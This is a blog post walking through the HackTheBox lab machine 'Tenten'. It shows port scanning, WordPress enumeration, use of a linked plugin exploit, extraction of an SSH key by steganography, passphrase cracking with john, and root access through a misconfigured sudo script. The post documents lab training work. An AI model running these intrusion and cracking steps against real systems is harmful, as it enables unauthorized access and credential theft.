<!DOCTYPE html>
<html lang="en-us">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.10[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.10
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports, let&amp;rsquo;s get a deeper scan :'><title>[12] Tenten Hackthebox</title>

<link rel='canonical' href='https://example.com/posts/tenten-hackthebox/'>

<link rel="stylesheet" href="/scss/style.min.css"><meta property='og:title' content='[12] Tenten Hackthebox'>
<meta property='og:description' content='[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.10[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.10
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports, let&amp;rsquo;s get a deeper scan :'>
<meta property='og:url' content='https://example.com/posts/tenten-hackthebox/'>
<meta property='og:site_name' content='Maikypedia'>
<meta property='og:type' content='article'><meta property='article:section' content='Posts' /><meta property='article:published_time' content='2021-03-30T00:38:04&#43;02:00'/><meta property='article:modified_time' content='2021-03-30T00:38:04&#43;02:00'/>
<meta name="twitter:title" content="[12] Tenten Hackthebox">
<meta name="twitter:description" content="[*] INDEX:  BOX INFO GAINING ACCESS PRIVILEGE ESCALATION  [&#43;] BOX INFO :computer: : Operative System : Linux :penguin:Difficulty : Medium :first_quarter_moon:Owner : ch4pIP : 10.10.10.10[&#43;] PART 1 - GAIN ACCESS The first step is scanning machine&amp;rsquo;s ports with nmap:
 nmap -p- &amp;ndash;open -T5 -n 10.10.10.10
 PORT STATE SERVICE22/tcp open ssh80/tcp open httpOnce seen open ports, let&amp;rsquo;s get a deeper scan :">
    </head>
    <body class="article-page keep-sidebar">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.body.dataset.scheme = 'dark';
        } else {
            document.body.dataset.scheme = 'light';
        }
    })();
</script><div class="container main-container flex on-phone--column extended ">
            <aside class="sidebar left-sidebar sticky">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="Toggle Menu">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header class="site-info">
        
            <figure class="site-avatar">
                
                    
                    
                    
                        
                        <img src="/img/maiky_hue62232bf39c5ba17479eab350663cd81_63325_300x0_resize_q75_box.jpeg" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                

                
                    <span class="emoji">🕵️</span>
                
            </figure>
        
        <h1 class="site-name"><a href="https://example.com">Maikypedia</a></h1>
        <h2 class="site-description">I&#39;m Maiky...</h2>
    </header>

    <ol class="menu" id="main-menu">
        
        
        

        <li >
            <a href='/posts'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>Home</span>
            </a>
        </li>
        
        

        <li >
            <a href='/categories/hack-the-box'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="24" height="24" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" style="-ms-transform: rotate(360deg); -webkit-transform: rotate(360deg); transform: rotate(360deg);"><path d="M11.996 0a1.119 1.119 0 0 0-.057.003a.9.9 0 0 0-.236.05a.907.907 0 0 0-.165.079L1.936 5.675a.889.889 0 0 0-.445.77V17.556a.889.889 0 0 0 .47.784l9.598 5.541l.054.029v.002a.857.857 0 0 0 .083.035l.012.004c.028.01.056.018.085.024c.01.001.011.003.016.004a.93.93 0 0 0 .296.015a.683.683 0 0 0 .086-.015c.01 0 .011-.002.016-.004a.94.94 0 0 0 .085-.024l.012-.004a.882.882 0 0 0 .083-.035v-.002a1.086 1.086 0 0 0 .054-.029l9.599-5.541a.889.889 0 0 0 .469-.784V6.48l-.001-.026v-.008a.889.889 0 0 0-.312-.676l-.029-.024c0-.002-.01-.005-.01-.007a.899.899 0 0 0-.107-.07L12.453.127A.887.887 0 0 0 11.99 0zm.01 2.253c.072 0 .144.019.209.056l6.537 3.774a.418.418 0 0 1 0 .724l-6.537 3.774a.418.418 0 0 1-.418 0L5.26 6.807a.418.418 0 0 1 0-.724l6.537-3.774a.42.42 0 0 1 .209-.056zm-8.08 6.458a.414.414 0 0 1 .215.057l6.524 3.766a.417.417 0 0 1 .208.361v7.533a.417.417 0 0 1-.626.361l-6.523-3.766a.417.417 0 0 1-.209-.362V9.13c0-.241.196-.414.41-.418zm16.16 0c.215.004.41.177.41.418v7.532c0 .15-.08.287-.208.362l-6.524 3.766a.417.417 0 0 1-.626-.361v-7.533c0-.149.08-.286.209-.36l6.523-3.767a.415.415 0 0 1 .216-.057z" fill="#626262"/><rect x="0" y="0" width="24" height="24" fill="rgba(0, 0, 0, 0)" /></svg>
                
                <span>HackTheBox</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://www.instagram.com/c.pasttor/'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zm0-2.163c-3.259 0-3.667.014-4.947.072-4.358.2-6.78 2.618-6.98 6.98-.059 1.281-.073 1.689-.073 4.948 0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98 1.281.058 1.689.072 4.948.072 3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98-1.281-.059-1.69-.073-4.949-.073zm0 5.838c-3.403 0-6.162 2.759-6.162 6.162s2.759 6.163 6.162 6.163 6.162-2.759 6.162-6.163c0-3.403-2.759-6.162-6.162-6.162zm0 10.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"/></svg>
                
                <span>Instagram</span>
            </a>
        </li>
        
        

        <li >
            <a href='https://twitter.com/Maiky_py'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z"/></svg>
                
                <span>Twitter</span>
            </a>
        </li>
        
        

        <li >
            <a href='/about/whoami'>
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>Whoami</span>
            </a>
        </li>
        

        
            <li id="dark-mode-toggle">
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                <span>Dark Mode</span>
            </li>
        
    </ol>
</aside>

            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/hack-the-box/" >
                Hack-The-Box
            </a>
        
    </header>
    

    <h2 class="article-title">
        <a href="/posts/tenten-hackthebox/">[12] Tenten Hackthebox</a>
    </h2>

    <footer class="article-time">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-clock" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <polyline points="12 7 12 12 15 15" />
</svg>



        <time class="article-time--published">Mar 30, 2021</time>
    </footer></div>
</header>

    <section class="article-content">
    <p><img src="/static/HACKING/tenten-index.jpg" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-index">[*] INDEX:</h1>
<ul>
<li><a class="link" href="#-box-info--" >BOX INFO</a></li>
<li><a class="link" href="#-part-1---gain-access" >GAINING ACCESS</a></li>
<li><a class="link" href="#-part-2---privesc" >PRIVILEGE ESCALATION</a></li>
</ul>
<h1 id="-box-info-computer-">[+] BOX INFO :computer: :</h1>
<pre><code>Operative System : Linux :penguin:
Difficulty : Medium :first_quarter_moon:
Owner : ch4p
IP : 10.10.10.10
</code></pre><h1 id="-part-1---gain-access">[+] PART 1 - GAIN ACCESS</h1>
<p>The first step is scanning machine&rsquo;s ports with nmap:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-p-&#43;--open&#43;-T5&#43;-n&#43;10.10.10.10"  target="_blank" rel="noopener"
    >nmap -p- &ndash;open -T5 -n 10.10.10.10</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre><p>Once seen open ports, let&rsquo;s get a deeper scan :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=nmap&#43;-sV&#43;-sC&#43;-sS&#43;-p22%2C80&#43;10.10.10.10"  target="_blank" rel="noopener"
    >nmap -sV -sC -sS -p22,80 10.10.10.10</a></p>
</blockquote>
<pre><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal &amp;#8211; Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Nothing interesting here, let&rsquo;s check the website :</p>
<p><img src="/static/HACKING/tenten-1.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>So this is a <code>WordPress 4.7.3</code>, we have to take this into account, but first of all let&rsquo;s fuzz the website, in my case I&rsquo;ll be using <code>wfuzz</code> :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.10/FUZZ &ndash;hc=404 -L</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="o">********************************************************</span>
<span class="o">*</span> <span class="n">Wfuzz</span> <span class="m">3.1.0</span> <span class="o">-</span> <span class="n">The</span> <span class="n">Web</span> <span class="n">Fuzzer</span>                         <span class="o">*</span>
<span class="o">********************************************************</span>

<span class="n">Target</span><span class="o">:</span> <span class="n">http</span><span class="o">://</span><span class="m">10.10.10.10</span><span class="o">/</span><span class="n">FUZZ</span>
<span class="n">Total</span> <span class="n">requests</span><span class="o">:</span> <span class="m">207643</span>

<span class="o">=====================================================================</span>
<span class="n">ID</span>           <span class="n">Response</span>   <span class="n">Lines</span>    <span class="n">Word</span>       <span class="n">Chars</span>       <span class="n">Payload</span>                                                                                                                                                                   
<span class="o">=====================================================================</span>
                                                                                                                                                               
<span class="m">000000238</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">0</span> <span class="n">L</span>      <span class="m">0</span> <span class="n">W</span>        <span class="m">0</span> <span class="n">Ch</span>     <span class="s">&#34;wp-content&#34;</span>                                                                                                                                                                                                               
<span class="m">000006682</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">66</span> <span class="n">L</span>     <span class="m">186</span> <span class="n">W</span>      <span class="m">2815</span> <span class="n">Ch</span>     <span class="s">&#34;wp-admin&#34;</span>
</code></pre></div><p>Let&rsquo;s check those directories :</p>
<p><code>wp-admin</code> :</p>
<p><img src="/static/HACKING/tenten-2.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p><code>wp-content</code> :</p>
<p><img src="/static/HACKING/tenten-3.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Hmmm login page doesn&rsquo;t seem vulnerable either, le&rsquo;s scan Wordpress with <code>wpscan</code> :</p>
<blockquote>
<p>wpscan &ndash;enumerate ap,at,tt,u &ndash;url http://10.10.10.10</p>
</blockquote>
<p>Some important info :</p>
<p><code>Version</code></p>
<pre><code>[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.10.10/index.php/feed/, &lt;generator&gt;https://wordpress.org/?v=4.7.3&lt;/generator&gt;
 |  - http://10.10.10.10/index.php/comments/feed/, &lt;generator&gt;https://wordpress.org/?v=4.7.3&lt;/generator&gt;
</code></pre><p><code>Theme</code></p>
<pre><code>[+] WordPress theme in use: twentyseventeen
 | Location: http://10.10.10.10/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://10.10.10.10/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.10.10/wp-content/themes/twentyseventeen/style.css?ver=4.7.3, Match: 'Version: 1.1'
</code></pre><p><code>Plugin</code></p>
<pre><code>[+] job-manager
 | Location: http://10.10.10.10/wp-content/plugins/job-manager/
 | Latest Version: 0.7.25 (up to date)
 | Last Updated: 2015-08-25T22:44:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.2.5 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
</code></pre><p><code>User</code></p>
<pre><code>[+] takis
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&amp;page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
</code></pre><p>We got a user! This is nice and the plugin &ldquo;job-manager&rdquo; looks interesting, let&rsquo;s see if it has any vulnerability :</p>
<p><img src="/static/HACKING/tenten-4.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>I have also found an <a class="link" href="https://gist.github.com/DoMINAToR98/4ed677db5832e4b4db41c9fa48e7bdef"  target="_blank" rel="noopener"
    >exploit</a> for this service, but it needs a filename, we don&rsquo;t have it yet, let&rsquo;s keep enumerating&hellip;</p>
<p>I just realized that I didn&rsquo;t fuzz the website correctly, I should have run it from <code>http://10.10.10.10/index.php</code> and not <code>http://10.10.10.10</code>, so, let&rsquo;s try again :</p>
<blockquote>
<p>wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.10/index.php/FUZZ &ndash;hc=404 -L</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-s" data-lang="s"><span class="o">********************************************************</span>
<span class="o">*</span> <span class="n">Wfuzz</span> <span class="m">3.1.0</span> <span class="o">-</span> <span class="n">The</span> <span class="n">Web</span> <span class="n">Fuzzer</span>                         <span class="o">*</span>
<span class="o">********************************************************</span>

<span class="n">Target</span><span class="o">:</span> <span class="n">http</span><span class="o">://</span><span class="m">10.10.10.10</span><span class="o">/</span><span class="n">index.php</span><span class="o">/</span><span class="n">FUZZ</span>
<span class="n">Total</span> <span class="n">requests</span><span class="o">:</span> <span class="m">207643</span>

<span class="o">=====================================================================</span>
<span class="n">ID</span>           <span class="n">Response</span>   <span class="n">Lines</span>    <span class="n">Word</span>       <span class="n">Chars</span>       <span class="n">Payload</span>                                           
<span class="o">=====================================================================</span>
                                             
<span class="m">000000014</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">328</span> <span class="n">L</span>    <span class="m">3654</span> <span class="n">W</span>     <span class="m">54026</span> <span class="n">Ch</span>    <span class="s">&#34;http://10.10.10.10/&#34;</span>                             
<span class="m">000000037</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">36</span> <span class="n">L</span>     <span class="m">85</span> <span class="n">W</span>       <span class="m">1655</span> <span class="n">Ch</span>     <span class="s">&#34;rss&#34;</span>                                             
<span class="m">000000126</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">36</span> <span class="n">L</span>     <span class="m">85</span> <span class="n">W</span>       <span class="m">1655</span> <span class="n">Ch</span>     <span class="s">&#34;feed&#34;</span>                                            
<span class="m">000000130</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">449</span> <span class="n">L</span>    <span class="m">3810</span> <span class="n">W</span>     <span class="m">55496</span> <span class="n">Ch</span>    <span class="s">&#34;jobs&#34;</span>                                            
<span class="m">000000124</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">328</span> <span class="n">L</span>    <span class="m">3654</span> <span class="n">W</span>     <span class="m">54026</span> <span class="n">Ch</span>    <span class="s">&#34;0&#34;</span>                                               
<span class="m">000000169</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">33</span> <span class="n">L</span>     <span class="m">97</span> <span class="n">W</span>       <span class="m">1686</span> <span class="n">Ch</span>     <span class="s">&#34;atom&#34;</span>                                            
<span class="m">000000187</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">299</span> <span class="n">L</span>    <span class="m">3650</span> <span class="n">W</span>     <span class="m">52341</span> <span class="n">Ch</span>    <span class="s">&#34;s&#34;</span>                                               
<span class="m">000000241</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">443</span> <span class="n">L</span>    <span class="m">3801</span> <span class="n">W</span>     <span class="m">55330</span> <span class="n">Ch</span>    <span class="s">&#34;p&#34;</span>                                               
<span class="m">000000454</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">372</span> <span class="n">L</span>    <span class="m">3926</span> <span class="n">W</span>     <span class="m">58120</span> <span class="n">Ch</span>    <span class="s">&#34;h&#34;</span>                                               
<span class="m">000000544</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">36</span> <span class="n">L</span>     <span class="m">85</span> <span class="n">W</span>       <span class="m">1655</span> <span class="n">Ch</span>     <span class="s">&#34;rss2&#34;</span>                                            
<span class="m">000000660</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">449</span> <span class="n">L</span>    <span class="m">3810</span> <span class="n">W</span>     <span class="m">55496</span> <span class="n">Ch</span>    <span class="s">&#34;j&#34;</span>                                               
<span class="m">000001232</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">449</span> <span class="n">L</span>    <span class="m">3810</span> <span class="n">W</span>     <span class="m">55496</span> <span class="n">Ch</span>    <span class="s">&#34;job&#34;</span>                                                                                      
<span class="m">000001506</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">34</span> <span class="n">L</span>     <span class="m">74</span> <span class="n">W</span>       <span class="m">1486</span> <span class="n">Ch</span>     <span class="s">&#34;rdf&#34;</span>                                             
<span class="m">000001533</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">328</span> <span class="n">L</span>    <span class="m">3654</span> <span class="n">W</span>     <span class="m">54026</span> <span class="n">Ch</span>    <span class="s">&#34;page1&#34;</span>                                           
<span class="m">000001677</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">299</span> <span class="n">L</span>    <span class="m">3650</span> <span class="n">W</span>     <span class="m">52341</span> <span class="n">Ch</span>    <span class="s">&#34;sample&#34;</span>                                          
<span class="m">000003094</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">372</span> <span class="n">L</span>    <span class="m">3926</span> <span class="n">W</span>     <span class="m">58120</span> <span class="n">Ch</span>    <span class="s">&#34;he&#34;</span>                                              
<span class="m">000003943</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">299</span> <span class="n">L</span>    <span class="m">3650</span> <span class="n">W</span>     <span class="m">52341</span> <span class="n">Ch</span>    <span class="s">&#34;sam&#34;</span>                                             
<span class="m">000004753</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">443</span> <span class="n">L</span>    <span class="m">3801</span> <span class="n">W</span>     <span class="m">55330</span> <span class="n">Ch</span>    <span class="s">&#34;pe&#34;</span>                                              
<span class="m">000005252</span><span class="o">:</span>   <span class="m">200</span>        <span class="m">372</span> <span class="n">L</span>    <span class="m">3926</span> <span class="n">W</span>     <span class="m">58120</span> <span class="n">Ch</span>    <span class="s">&#34;hello&#34;</span> 
</code></pre></div><p>After a small enumeration, inside jobs I found this pretty interesting detail :</p>
<p><img src="/static/HACKING/tenten-5.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>If we get into pentesting we can see the option to apply content, and look at the URL :</p>
<p><img src="/static/HACKING/tenten-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>There is an 8, maybe that&rsquo;s some kind of id? Let&rsquo;s try to change it to 1 for example :</p>
<p><img src="/static/HACKING/tenten-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>The content has changed&hellip; Let&rsquo;s try until we find something interesting. If we arrive to 13 we can see this :</p>
<p><img src="/static/HACKING/tenten-8.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Maybe <code>HackerAccessGranted</code> is the filename the <a class="link" href="https://gist.github.com/DoMINAToR98/4ed677db5832e4b4db41c9fa48e7bdef"  target="_blank" rel="noopener"
    >exploit</a> needed? Let&rsquo;s try to run it :</p>
<p><img src="/static/HACKING/tenten-9.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Let&rsquo;s go there :</p>
<blockquote>
<p>http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg</p>
</blockquote>
<p><img src="/static/HACKING/tenten-10.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>What :hushed: ? Let&rsquo;s download the photo, maybe there is some kind of hidden info, I&rsquo;ll be doing <code>steganography</code>, and the tool I&rsquo;ll be using is <code>steghide</code>:</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=steghide&#43;--extract&#43;-sf&#43;HackerAccessGranted.jpg"  target="_blank" rel="noopener"
    >steghide &ndash;extract -sf HackerAccessGranted.jpg</a></p>
</blockquote>
<p><img src="/static/HACKING/tenten-11.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>We got a id_rsa! Let&rsquo;s try to login through ssh with the user <code>takis</code> :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=ssh&#43;-i&#43;id_rsa&#43;takis%4010.10.10.10"  target="_blank" rel="noopener"
    >ssh -i id_rsa takis@10.10.10.10</a></p>
</blockquote>
<pre><code>Enter passphrase for key 'id_rsa': 
</code></pre><p>Oh, we have to crack the id_rsa first, let&rsquo;s do it with john.</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=python&#43;%2Fusr%2Fshare%2Fjohn%2Fssh2john.py&#43;id_rsa&#43;%3E&#43;hash"  target="_blank" rel="noopener"
    >python /usr/share/john/ssh2john.py id_rsa &gt; hash</a></p>
</blockquote>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=john&#43;hash&#43;--wordlist%3D%2Fusr%2Fshare%2Fwordlists%2Frockyou.txt"  target="_blank" rel="noopener"
    >john hash &ndash;wordlist=/usr/share/wordlists/rockyou.txt</a></p>
</blockquote>
<p><img src="/static/HACKING/tenten-12.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Got the pass! Now let&rsquo;s try to login again :</p>
<p><img src="/static/HACKING/tenten-13.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>Running <code>sudo -l</code> we see this :</p>
<pre><code>Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin
</code></pre><p>So we can execute <code>/bin/fuckin</code> as root without password, let&rsquo;s see what the script does :</p>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh"><span class="cp">#!/bin/bash
</span><span class="cp"></span><span class="nv">$1</span> <span class="nv">$2</span> <span class="nv">$3</span> <span class="nv">$4</span>
</code></pre></div><p>So this will execute with bash the parameter 1-4, if we run sudo /bin/fuckin whoami we should get a &ldquo;root&rdquo;, let&rsquo;s try :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=sudo&#43;%2Fbin%2Ffuckin&#43;whoami"  target="_blank" rel="noopener"
    >sudo /bin/fuckin whoami</a></p>
</blockquote>
<p><img src="/static/HACKING/tenten-14.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice :smile: ! This is a piece of cake, let&rsquo;s get a shell with</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=sudo&#43;%2Fbin%2Ffuckin&#43;%2Fbin%2Fbash"  target="_blank" rel="noopener"
    >sudo /bin/fuckin /bin/bash</a></p>
</blockquote>
<p><img src="/static/HACKING/tenten-14.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
